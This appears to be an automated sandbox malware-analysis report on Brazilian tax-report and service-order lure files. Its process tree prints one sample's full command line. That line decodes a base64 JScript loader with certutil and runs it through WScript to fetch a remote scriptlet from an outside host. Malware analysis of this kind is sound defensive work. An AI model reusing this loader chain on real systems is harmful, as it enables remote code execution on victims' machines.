Overview
overview
8Static
static
ORDEM20DE2...56.zip
windows10-2004-x64
1ORDEM20DE2...85.cmd
windows10-2004-x64
8ORDEM20DE2...85.lnk
windows10-2004-x64
8RelatorioI...bf.zip
windows10-2004-x64
1RelatorioI...34.lnk
windows10-2004-x64
8RelatorioI...d5.zip
windows10-2004-x64
1RelatorioI...89.lnk
windows10-2004-x64
8RelatorioI...66.zip
windows10-2004-x64
1RelatorioI...04.lnk
windows10-2004-x64
8RelatorioI...89.zip
windows10-2004-x64
1RelatorioI...80.lnk
windows10-2004-x64
8RelatorioI...93.zip
windows10-2004-x64
1RelatorioI...03.lnk
windows10-2004-x64
8RelatorioI...59.zip
windows10-2004-x64
1RelatorioI...14.lnk
windows10-2004-x64
8RelatorioI...09.zip
windows10-2004-x64
1RelatorioI...73.lnk
windows10-2004-x64
7RelatorioI...17.zip
windows10-2004-x64
1RelatorioI...95.zip
windows10-2004-x64
1RelatorioI...15.zip
windows10-2004-x64
1RelatorioI...49.zip
windows10-2004-x64
1RelatorioI...73.zip
windows10-2004-x64
1RelatorioI...86.zip
windows10-2004-x64
1RelatorioI...51.zip
windows10-2004-x64
1RelatorioI...13.zip
windows10-2004-x64
1RelatorioI...39.zip
windows10-2004-x64
1RelatorioI...39.zip
windows10-2004-x64
1RelatorioI...61.zip
windows10-2004-x64
1Analysis
-
max time kernel
67s -
max time network
131s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
20/12/2022, 14:49
Static task
static1
Behavioral task
behavioral1
Sample
ORDEM20DE20SERVICO_3723658_257.52281.65156.zip
Resource
win10v2004-20221111-en
Behavioral task
behavioral2
Sample
ORDEM20DE20SERVICO_3723658_257.52281487.681164.08685.cmd
Resource
win10v2004-20220812-en
Behavioral task
behavioral3
Sample
ORDEM20DE20SERVICO_3723658_257.52281487.681164.08685.lnk
Resource
win10v2004-20221111-en
Behavioral task
behavioral4
Sample
RelatorioIRPF2022govbr5c3db59959bf.zip
Resource
win10v2004-20220901-en
Behavioral task
behavioral5
Sample
RelatorioIRPF2022govbr5c3db59959bf244.368958.21034.lnk
Resource
win10v2004-20220812-en
Behavioral task
behavioral6
Sample
RelatorioIRPF2022govbrb1143240a1d5.zip
Resource
win10v2004-20221111-en
Behavioral task
behavioral7
Sample
RelatorioIRPF2022govbrb1143240a1d5995.562115.49789.lnk
Resource
win10v2004-20221111-en
Behavioral task
behavioral8
Sample
RelatorioIRPF2022x_014.65300.83266.zip
Resource
win10v2004-20220812-en
Behavioral task
behavioral9
Sample
RelatorioIRPF2022x_014.65300529.531872.49304.lnk
Resource
win10v2004-20221111-en
Behavioral task
behavioral10
Sample
RelatorioIRPF2022x_104.32165.98789.zip
Resource
win10v2004-20220901-en
Behavioral task
behavioral11
Sample
RelatorioIRPF2022x_104.32165858.739349.99080.lnk
Resource
win10v2004-20220812-en
Behavioral task
behavioral12
Sample
RelatorioIRPF2022x_169.98458.00393.zip
Resource
win10v2004-20220812-en
Behavioral task
behavioral13
Sample
RelatorioIRPF2022x_169.98458933.600712.90503.lnk
Resource
win10v2004-20221111-en
Behavioral task
behavioral14
Sample
RelatorioIRPF2022x_204.11764.46059.zip
Resource
win10v2004-20221111-en
Behavioral task
behavioral15
Sample
RelatorioIRPF2022x_204.11764896.963161.08114.lnk
Resource
win10v2004-20220812-en
Behavioral task
behavioral16
Sample
RelatorioIRPF2022x_304.18016.08909.zip
Resource
win10v2004-20221111-en
Behavioral task
behavioral17
Sample
RelatorioIRPF2022x_304.18016813.095072.77073.lnk
Resource
win10v2004-20220901-en
Behavioral task
behavioral18
Sample
RelatorioIRPF2022x_319.23202.27717.zip
Resource
win10v2004-20220812-en
Behavioral task
behavioral19
Sample
RelatorioIRPF2022x_433.38734.41295.zip
Resource
win10v2004-20221111-en
Behavioral task
behavioral20
Sample
RelatorioIRPF2022x_437.03181.56215.zip
Resource
win10v2004-20221111-en
Behavioral task
behavioral21
Sample
RelatorioIRPF2022x_596.25619.99549.zip
Resource
win10v2004-20220812-en
Behavioral task
behavioral22
Sample
RelatorioIRPF2022x_700.89671.95873.zip
Resource
win10v2004-20221111-en
Behavioral task
behavioral23
Sample
RelatorioIRPF2022x_728.73414.79886.zip
Resource
win10v2004-20220812-en
Behavioral task
behavioral24
Sample
RelatorioIRPF2022x_774.19556.04451.zip
Resource
win10v2004-20220901-en
Behavioral task
behavioral25
Sample
RelatorioIRPF2022x_898.87816.47913.zip
Resource
win10v2004-20221111-en
Behavioral task
behavioral26
Sample
RelatorioIRPF2022x_950.42835.19339.zip
Resource
win10v2004-20220812-en
Behavioral task
behavioral27
Sample
RelatorioIRPF2022x_963.92207.96439.zip
Resource
win10v2004-20220812-en
Behavioral task
behavioral28
Sample
RelatorioIRPF2022x_973.20212.77261.zip
Resource
win10v2004-20220812-en
General
-
Target
ORDEM20DE20SERVICO_3723658_257.52281487.681164.08685.cmd
-
Size
319B
-
MD5
b12d4bce9bb30df5d98d85e39daa15ef
-
SHA1
a2d3348ed4e235a56e646b0e62a7269d882bf296
-
SHA256
a967868888873816b0053ada9296d867a3d990288242747604bbee867817d5ba
-
SHA512
a5e18c96e689cd52ed5118760e584e58ba1b5b5897984b4891d6a4401fa727738d8997229995eb93e4aa63890806adfd68418d76ce6c891cd26bf99ee68ef468
Malware Config
Signatures
-
Blocklisted process makes network request 3 IoCs
flow pid Process 10 4688 WScript.exe 12 4688 WScript.exe 13 4688 WScript.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings cmd.exe -
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 4684 wrote to memory of 1868 4684 cmd.exe 79 PID 4684 wrote to memory of 1868 4684 cmd.exe 79 PID 1868 wrote to memory of 4676 1868 cmd.exe 81 PID 1868 wrote to memory of 4676 1868 cmd.exe 81 PID 1868 wrote to memory of 4780 1868 cmd.exe 82 PID 1868 wrote to memory of 4780 1868 cmd.exe 82 PID 4780 wrote to memory of 4688 4780 cmd.exe 83 PID 4780 wrote to memory of 4688 4780 cmd.exe 83
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ORDEM20DE20SERVICO_3723658_257.52281487.681164.08685.cmd"1⤵
- Suspicious use of WriteProcessMemory
PID:4684 -
C:\Windows\system32\cmd.execmd C:\Windows\system32\cmd.exe /V/D/c "MD C:\5S7NMAL\>nul&&s^eT YSIZ=C:\5S7NMAL\^5S7NMAL&&echo dmFyIENYbEk9InNjIisiciI7RFhsST0iaXAiKyJ0OmgiO0VYbEk9IlQiKyJ0UCIrIjoiO0dldE9iamVjdChDWGxJK0RYbEkrRVhsSSsiLy9lYWlwZy5sdWl6b3R2aW9nb25hbHZlcy5tb20vPzEvIik7>!YSIZ!.^Js&&certutil -f -decode !YSIZ!.^Js !YSIZ!.^Js&&CMD /c !YSIZ!.^Js"2⤵
- Suspicious use of WriteProcessMemory
PID:1868 -
C:\Windows\system32\certutil.execertutil -f -decode C:\5S7NMAL\5S7NMAL.Js C:\5S7NMAL\5S7NMAL.Js3⤵PID:4676
-
-
C:\Windows\system32\cmd.exeCMD /c C:\5S7NMAL\5S7NMAL.Js3⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4780 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\5S7NMAL\5S7NMAL.Js"4⤵
- Blocklisted process makes network request
PID:4688
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
114B
MD53ee0f3379b071c18037adb5417d60534
SHA13ceb7998471e014d50edb7e919c52cf23e701173
SHA256a3bdd5f02a682a3cf3188e5c1a0dfed7b599cd5d36ba185d33b7951835cf9884
SHA512a45259d3f9797e7d34d3da38a002d289dc1883d08ab9bc2041407dad12b01e589e72facce98eb9b678bb83e3e322466f614e0fadc119922af00d0f2714852ad6
-
Filesize
114B
MD53ee0f3379b071c18037adb5417d60534
SHA13ceb7998471e014d50edb7e919c52cf23e701173
SHA256a3bdd5f02a682a3cf3188e5c1a0dfed7b599cd5d36ba185d33b7951835cf9884
SHA512a45259d3f9797e7d34d3da38a002d289dc1883d08ab9bc2041407dad12b01e589e72facce98eb9b678bb83e3e322466f614e0fadc119922af00d0f2714852ad6